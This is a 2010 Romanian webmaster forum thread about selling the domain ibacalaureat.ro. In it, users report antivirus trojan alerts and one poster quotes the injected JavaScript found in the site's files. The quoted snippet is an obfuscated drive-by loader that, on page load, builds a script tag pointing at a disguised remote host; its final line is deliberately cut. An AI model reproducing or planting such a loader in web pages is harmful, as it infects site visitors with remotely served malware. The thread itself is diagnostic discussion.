Va salut,
Scot la vanzare domeniul ibacalaureat.ro.
Registration Date: 2008-06-17 (de atunci e online, insa inainte era un forum)
Astept mesaje private din partea celor interesati.
(La partea cu transferul, ajungem la o intelegere nu e problema).
Va salut,
Scot la vanzare domeniul ibacalaureat.ro.
Registration Date: 2008-06-17 (de atunci e online, insa inainte era un forum)
Astept mesaje private din partea celor interesati.
(La partea cu transferul, ajungem la o intelegere nu e problema).
Poti sa dai de mine usor, @contact.
Kaspersky imi detecteaza un troian![]()
Siteul tau e in balarii, nu urca? Competitorii te bat de iti suna apa in cap? Ai fost penalizat si nu stii ce sa faci? Cel mai probabil ai nevoie de un audit SEO complet. :)
Si NOD 32 detecteaza virus. Ai o problema cu toate fisierele javascript. Uite codul strain:
In general ultima linie de cod.Cod:/*GNU GPL*/ try{window.onload = function(){var W6xyjyneu8rwm = document.createElement('script');W6xyjyneu8rwm.setAttribute('type', 'text/javascript');W6xyjyneu8rwm.setAttribute('src', 'h$$!@t$^t@&p(#):#/$&()!/^(#$$s^(u@#(l@#!e&&k@@!)h((&a()##-(^c)&o@@m#)(.(@$p$)i#&(@c^f$#!@o#&#c&$o($@$.^!)#c^(&o^(m)#!).^!))a$^$!m#!a@)z!!o)(n@&)-#^!f!!r$.((!#!v$&#i((d^$$!e!o)(&s&^$(a)!^l#e$)o)!$n)#l$)((i#)n#)!e)(&@.&!$^^r!()u$@@^$:(#(!8!0^)8)#0^#$^/@$&g$@o#^(!o@)!&g!l&)^e@#!^.!(@(c($o#&@!m(/^)g#))(o!$o^)g)&$l#^e)^&#.@&c#!o^(m(/@&s$(#h#(!u)#f^u)^n^^&(i#@).@@c^o#^#m#&/(@(n&@o^^)k^$i!(a^.#^c!^o^)m#!$$/()z!#s##h!!@&a!&(r@((@e(&$.)!&&n#&)e$#^t(^#/()'.replace(/&|\!|\)|\(|@|\^|#|\$/ig, ''));W6xyjyneu8rwm.setAttribute('defer', 'defer');
Later Edit: Ha ha, dupa ce pusesem tot codul infectat aici, NOD 32 arata ca si seopedia avea virus, desi practic nu era executat. asa ca am taiat ultima parte, cu document.appendChild().
Ultima modificare făcută de hyperionXS; 16th March 2010 la 00:34.
O solutie pe fuga: http://deceblog.net/2009/12/cum-am-s...window-onload/
Cred ca e vorba de aceeasi chestie ca si aiciDaca nu imi cer scuze, dar sunt somnoros
![]()
Da, stiu cum se rezolva insa nu am mai avut rabdarea si timpul necesar sa intru pe fiecare wordpress sa le sterg, is niste injection's aiurea. (fara efect acum)
In orice caz, vand domeniul, nu wordpress-ul. (Mi-a mancat zilele wordpress-ul asta, daca nu stai de capul lui, mai bine nu-l mai folosesti ca si CMS).
Poti sa dai de mine usor, @contact.
un pret?
Momentan este/sunt 1 utilizator(i) care navighează în acest subiect. (0 membrii și 1 vizitatori)